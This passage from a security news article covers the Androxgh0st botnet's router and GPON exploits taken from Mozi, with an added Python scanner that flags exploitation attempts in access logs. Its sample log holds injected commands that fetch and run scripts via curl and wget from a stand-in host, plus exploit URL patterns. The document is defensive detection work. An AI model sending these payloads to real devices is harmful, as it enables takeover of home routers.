IoT vulnerability inherited from Mozi
Another interesting addition to its arsenal is a set of exploit functions for several home routers and ISP-distributed gigabit passive optical network (GPON) devices. These include an unauthenticated command injection (CVE-2023-1389) in the TP-Link Archer AX21, a remote code execution flaw in the OptiLink ONT1GEW GPON, an unauthenticated command injection in Netgear DGN devices, and two vulnerabilities in the Dasan GPON home router: an authentication bypass and a command injection.
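A defender's first question about a list like this is what the exploitation attempts look like on the wire. The following is an added example, not code from the article or from CloudSEK: a small scanner that runs request-target signatures over web-server access logs for three of the bugs above. The URL patterns are my assumptions, taken from public advisories and writeups rather than from this article (the TP-Link `country`/`operation=write` sink, the Dasan `?images/` auth-bypass suffix on `diag_Form`, the Netgear `setup.cgi` `todo=syscmd` handler); the OptiLink bug is omitted. The log lines are constructed for the example.

```python
"""Flag router/GPON exploitation attempts in combined-format HTTP access logs.

Added example for this article; the signatures below are ASSUMPTIONS drawn
from public advisories, not from the article or from CloudSEK's research.
"""
import re
from urllib.parse import unquote

# Request-target signatures (matched against the URL-decoded request target).
SIGNATURES = {
    # CVE-2023-1389: unauthenticated command injection in the TP-Link Archer
    # AX21 locale form; the 'write' operation passes 'country' to a shell.
    "tplink_archer_ax21_cve_2023_1389": re.compile(
        r"/cgi-bin/luci/;stok=/locale\?(?=.*\boperation=write\b)(?=.*\bcountry=)", re.I),
    # Dasan GPON: appending '?images/' bypasses authentication; diag_Form is the
    # command-injection sink, but the injected command travels in the POST body,
    # so the URL alone is what an access log lets us see.
    "dasan_gpon_auth_bypass_diag_form": re.compile(r"/GponForm/diag_Form\?images/", re.I),
    # Netgear DGN: setup.cgi's 'syscmd' handler executes the 'cmd' parameter.
    "netgear_dgn_setup_cgi_syscmd": re.compile(r"/setup\.cgi\?(?=.*\btodo=syscmd\b)", re.I),
}

# Combined log format: ip ident user [ts] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Shell metacharacters that indicate a payload rather than a benign probe.
SHELL_META = re.compile(r"[;|`&]|\$\(")

# Constructed sample log (not real traffic). Documentation IPs (RFC 5737).
SAMPLE_LOG = """\
203.0.113.10 - - [01/Feb/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [01/Feb/2024:10:00:02 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(curl%20http://198.51.100.5/x.sh|sh) HTTP/1.1" 500 0 "-" "-"
203.0.113.12 - - [01/Feb/2024:10:00:03 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0 "-" "-"
203.0.113.13 - - [01/Feb/2024:10:00:04 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd%20/tmp;wget%20http://198.51.100.5/n&curpath=/&currentsetting.htm=1 HTTP/1.1" 404 0 "-" "-"
203.0.113.14 - - [01/Feb/2024:10:00:05 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""


def scan_log(text):
    """Return one hit dict per log line whose decoded request target matches a signature.

    Lines that do not parse as combined log format are skipped. A line matches
    at most one rule (first match wins). 'shell_meta' is True when the decoded
    target carries shell metacharacters, i.e. an actual injected command.
    """
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(m["target"])  # decode %20 etc. so payloads are visible
        for rule, pattern in SIGNATURES.items():
            if pattern.search(target):
                hits.append({
                    "ip": m["ip"],
                    "rule": rule,
                    "status": int(m["status"]),
                    "target": target,
                    "shell_meta": bool(SHELL_META.search(target)),
                })
                break
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']:15} {hit['rule']:36} status={hit['status']} "
              f"payload={'yes' if hit['shell_meta'] else 'no'} {hit['target']}")
```

The `operation=read` request on the TP-Link path is deliberately left unflagged: scanners and legitimate firmware UIs hit the same endpoint, and only the `write` operation with a `country` value reaches the vulnerable shell call. The Dasan rule fires on the URL alone because the POST body (where the injected command lives) is not recorded in an access log; pair it with full-request capture if you need the payload.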
Some of these exploits and payloads appear to have been inherited from Mozi, the China-origin botnet whose creators were reportedly arrested by Chinese authorities in 2021. After the legal action, an update was pushed to Mozi's bots that disrupted their ability to connect to the Internet, effectively disabling the botnet and leaving only a small fraction of nodes active.
“It is possible that Androxgh0st has fully integrated the Mozi payload as a module within its botnet structure,” CloudSEK researchers said. “In this case, Androxgh0st not only integrates with Mozi but embeds specific functionality of Mozi (e.g., IoT infection and distribution methods) into its standard set of functions.”